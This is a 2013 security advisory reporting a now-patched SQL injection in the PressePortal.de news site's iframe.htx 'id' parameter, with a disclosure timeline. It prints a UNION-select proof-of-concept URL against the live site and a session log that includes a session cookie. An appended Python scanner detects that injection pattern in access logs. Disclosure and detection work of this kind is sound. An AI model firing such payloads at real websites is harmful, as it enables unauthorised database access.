News Document Title:
====================
PressePortal DE patched critical SQL Injection Vulnerability

Release Date:
=============
2013-11-28

Laboratory Article:
===================
Today the NewsAktuell - PressePortal in Germany patched a critical remote SQL injection web vulnerability with a fast hotfix. The online service carries government, police, official department, international and national press articles and reports. PressePortal is one of the best-known news portal websites in Germany, run by the newsaktuell.de team.

At the end of April 2013 Marco Onorati sent us a short report about the issue. Our team notified the NewsAktuell PressePortal support by mail about the remote SQL injection in a main module of the website services. Nobody responded to our mails (several of them), so we took the initiative and called the news-aktuell office by phone. Shortly after the call they requested the data by phone and we transferred an advisory with images and resources to the administration of the helpdesk/dev team. Some hours later the issue was patched by a hotfix from the newsaktuell development team.

The vulnerability was located in the `../services/content` module, in the vulnerable iframe.htx file. Remote attackers were able to inject their own SQL commands via a GET request through the vulnerable `id` parameter. After the injection the website returns an obviously blank page: the page source takes the parameter value unchanged into the query, and the resulting SQL statement executes in the application DBMS. The issue is a classic remote SQL injection bug.

The security risk of the remote SQL injection web vulnerability is estimated as critical with a CVSS (Common Vulnerability Scoring System) count of 8.7(+).
Vulnerable Module(s):
[+] services/content

Vulnerable File(s):
[+] iframe.htx

Vulnerable Parameter(s):
[+] id


PoC: Remote SQL Injection
http://www.presseportal.de/services/content/iframe.htx?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20&inc=true


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://www.presseportal.de/services/content/iframe.htx?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20&inc=true
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[3145] Mime Type[text/html]
Request Headers:
Host[www.presseportal.de]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Cookie[PHPSESSID=emou1lkl2c3vin16agjg90eig1; PressePortalDeDst=portal6-pp.de; __utma=239002817.282394538.1385649109.1385649109.1385649109.1; __utmb=239002817.4.10.1385649109; __utmc=239002817; __utmz=239002817.1385649109.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=2%7C48; POPUPCHECK=1385735515782]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Date[Thu, 28 Nov 2013 14:52:27 GMT]
Server[Apache]
X-Powered-By[PHP/5.3.27]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Content-Type[text/html]
Content-Length[3145]
Connection[Keep-alive]
Via[1.1 AN-0003011040777600]


Reference(s):
http://www.presseportal.de/services/content/iframe.htx?id
https://www.presseportal.de/services/content/iframe.htx?id

Advisory:
http://www.vulnerability-lab.com/get_content.php?id=1150
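As an added defender-side example (not part of the advisory and not PressePortal's code): a small Python scanner that looks through web-server access logs for the injection shape described above, a closing quote followed by a falsifying boolean clause and UNION ... SELECT, in the URL-decoded `id` parameter of requests to iframe.htx. The log lines are constructed, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote_plus

# Heuristic for the injection shape reported in the advisory: a closing quote,
# a boolean clause that falsifies the original WHERE, then UNION ... SELECT.
UNION_INJECTION = re.compile(r"""['"]\s*(?:and|or)\b.*\bunion\b.*\bselect\b""", re.I | re.S)

# Minimal parser for combined-format access log lines (only the fields needed here).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TARGET_PATH = "/services/content/iframe.htx"
TARGET_PARAM = "id"

def decoded_values(target, name):
    """URL-decode each occurrence of a query parameter. parse_qs decodes once;
    the second pass normalises double-encoded payloads (%2527 -> %27 -> ')."""
    values = parse_qs(urlparse(target).query, keep_blank_values=True).get(name, [])
    return [unquote_plus(v) for v in values]

def is_union_injection(value):
    """True when a decoded parameter value matches the UNION-based pattern."""
    return UNION_INJECTION.search(value) is not None

def scan_access_log(lines):
    """Return (ip, timestamp, decoded id) for every request to iframe.htx whose
    id parameter carries a UNION-based injection; all other lines are ignored."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or urlparse(m["target"]).path != TARGET_PATH:
            continue
        for value in decoded_values(m["target"], TARGET_PARAM):
            if is_union_injection(value):
                hits.append((m["ip"], m["ts"], value))
    return hits

# Constructed sample log lines (not taken from the advisory's session log): a normal
# request, one shaped like the advisory's PoC, and a harmless value containing a quote.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Nov/2013:14:50:01 +0000] "GET /services/content/iframe.htx?id=b17ea41fbd7d93bcdda63799dd904314&inc=true HTTP/1.1" 200 3145',
    '203.0.113.9 - - [28/Nov/2013:14:52:27 +0000] "GET /services/content/iframe.htx?id=b17ea41fbd7d93bcdda63799dd904314%27%20and%201=2%20union%20select%201,2,@@version%20--+&inc=true HTTP/1.1" 200 3145',
    '203.0.113.7 - - [28/Nov/2013:14:53:10 +0000] "GET /services/content/iframe.htx?id=o%27neil&inc=true HTTP/1.1" 200 3145',
]

if __name__ == "__main__":
    for ip, ts, value in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} UNION injection in id: {value!r}")
```

The regex is a triage heuristic for this specific pattern, not a substitute for parameterised queries on the server side; a quoted but benign value such as `o'neil` is deliberately not flagged.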